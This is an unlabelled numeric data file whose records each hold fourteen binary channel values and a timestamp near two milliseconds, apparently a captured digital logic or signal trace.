1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9800840e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9801280e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9801520e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9802040e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9802280e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9802760e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9803000e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9803080e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.9803240e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9803520e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.9804040e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9804280e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9804360e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9804520e-03 1,1,1,1,1,0,0,0,0,1,0,0,0,0,1.9804760e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9804800e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.9805240e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9805480e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9805560e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9805720e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9805960e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9806240e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9806480e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9806760e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9807480e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9807720e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9807960e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9808040e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.9808760e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9808960e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9809080e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9809200e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.9809480e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9809760e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.9810000e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9810200e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9810320e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9810680e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9810920e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9811320e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9811560e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9812040e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9812240e-03 1,1,1,1,1,0,0,0,0,1,0,0,0,0,1.9812280e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9812320e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.9812840e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9813040e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.9813840e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9814040e-03 1,1,1,1,1,1,0,0,0,0,0,0,0,0,1.9814120e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9814160e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9814280e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9814520e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9814600e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.9814760e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9814960e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9815080e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9815400e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9815640e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9816080e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9816320e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9817000e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9817240e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9817640e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9817880e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9817960e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.9818120e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9818360e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9818440e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9818600e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9818760e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9819000e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9819240e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9819320e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.9819720e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9819920e-03 1,1,1,1,1,1,0,0,0,0,0,0,0,0,1.9820000e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9820040e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9820120e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9820360e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9820640e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9820880e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9821160e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9821400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9821640e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9821880e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9822120e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9822360e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9822440e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.9822920e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9823160e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.9823400e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9823640e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9823720e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9824120e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9824400e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9824920e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9825240e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9825720e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9825960e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9826040e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.9826200e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9826440e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9826520e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9826720e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9826960e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9827240e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9827480e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9827720e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9827960e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9828200e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9828480e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9828760e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9829000e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9829040e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.9829480e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9829720e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9829800e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9830000e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9830240e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9830480e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9830760e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9831000e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9831240e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9831280e-03 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.9831720e-03 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.9832000e-03 1,1,1,1,1,1,0,0,0,0,0,0,0,0,1.9832040e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9832080e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9832240e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9832480e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9832720e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9833000e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9833240e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9833480e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9833720e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9834040e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9834280e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9834520e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9834760e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9835040e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9835280e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9835560e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9835800e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9836040e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9836280e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9836520e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9836760e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9837040e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9837280e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9837560e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9837800e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9838040e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9838280e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9838520e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9838760e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9839040e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9839280e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9839560e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9839800e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9840040e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9840280e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9840560e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9840840e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9841080e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9841320e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9841560e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9841800e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9842040e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9842320e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9842560e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9842840e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9843080e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9843320e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9843560e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9843800e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9844040e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9844320e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9844560e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9844840e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9845080e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9845320e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9845560e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9845800e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9846040e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9846320e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9846560e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9846840e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9847080e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9847320e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9847560e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9847800e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9848040e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9848320e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9848560e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9848840e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9849080e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9849320e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9849560e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9849800e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9850040e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9850320e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9850560e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9850840e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9851080e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9851320e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9851560e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9851800e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9852040e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9852320e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9852560e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9852840e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9853080e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9853320e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9853560e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9853800e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9854040e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9854320e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9854560e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9854840e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9855080e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9855320e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9855560e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9855800e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9856040e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9856320e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9856560e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9856840e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9857080e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9857320e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9857560e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9857800e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9858040e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9858320e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9858560e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9858840e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9859080e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9859320e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9859560e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9859800e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9860040e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9860320e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9860560e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9860800e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9861080e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9861320e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9861560e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9861800e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9862040e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9862320e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9862520e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9862760e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9863040e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9863320e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9863560e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9863800e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9864040e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9864320e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9864520e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9864760e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9865040e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9865320e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9865560e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9865800e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9866040e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9866320e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9866520e-03 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.9866760e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.9867040e-03 1,1,1,1,1,0,0,0,0,0,0,0,0,1,2.1102120e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,1,2.1104120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,1,2.1104160e-03 0,0,0,0,0,0,0,0,0,0,0,1,0,1,2.1104520e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,1,2.1104760e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,1,2.1107640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,1,2.1107920e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,1,2.1108160e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,1,2.1108400e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,1,2.1108440e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,1,2.1108640e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,1,2.1108880e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,1,2.1108960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,1,2.1109160e-03 0,0,0,0,0,0,1,0,0,0,0,0,0,1,2.1109400e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,1,2.1109440e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,1,2.1109640e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,1,2.1109880e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,1,2.1109960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,1,2.1110120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1110400e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1110640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1110920e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1111160e-03 0,0,0,0,0,0,1,0,0,0,0,0,0,0,2.1111400e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1111440e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.1111640e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1111880e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.1112120e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1112400e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.1112640e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1112920e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1112960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1113160e-03 0,0,0,0,0,0,1,0,0,0,0,0,0,0,2.1113400e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1113440e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.1113640e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1113880e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1113960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1114120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1114400e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1114440e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.1114640e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1114880e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1114960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1115160e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1115400e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1115640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1115880e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1116120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1116360e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1116640e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1116920e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.1117160e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1117400e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1117480e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1117640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1117880e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1118120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1118400e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1118440e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.1118640e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1118920e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.1119160e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1119400e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.1119640e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1119880e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1119960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1120120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1120400e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1120440e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.1120640e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1120880e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1120960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1121160e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1121400e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1121640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1121880e-03 0,0,0,0,0,0,1,0,0,0,0,0,0,0,2.1121920e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1121960e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.1122120e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1122360e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.1122640e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1122920e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.1123160e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1123400e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.1123640e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1123880e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1123960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1124120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1124400e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1124640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1124920e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1125160e-03 0,0,0,0,0,0,1,0,0,0,0,0,0,0,2.1125400e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1125440e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.1125640e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1125880e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1125960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1126120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1126400e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1126640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1126880e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1127160e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1127400e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1127640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1127880e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1128120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1128360e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1128440e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.1128640e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1128920e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1128960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1129160e-03 0,0,0,0,0,0,1,0,0,0,0,0,0,0,2.1129400e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1129440e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.1129640e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1129880e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.1130120e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1130360e-03 0,0,0,0,0,0,1,0,0,0,1,0,1,0,2.1130640e-03 0,0,0,0,0,0,1,0,0,0,1,0,0,0,2.1130920e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1130960e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1131160e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1131400e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1131640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1131880e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1132120e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1132400e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1132640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1132880e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1133160e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1133400e-03 0,0,0,0,0,0,0,0,0,0,0,0,1,0,2.1133640e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,0,2.1133880e-03 0,0,0,0,0,0,1,0,0,0,0,0,0,0,2.1133920e-03 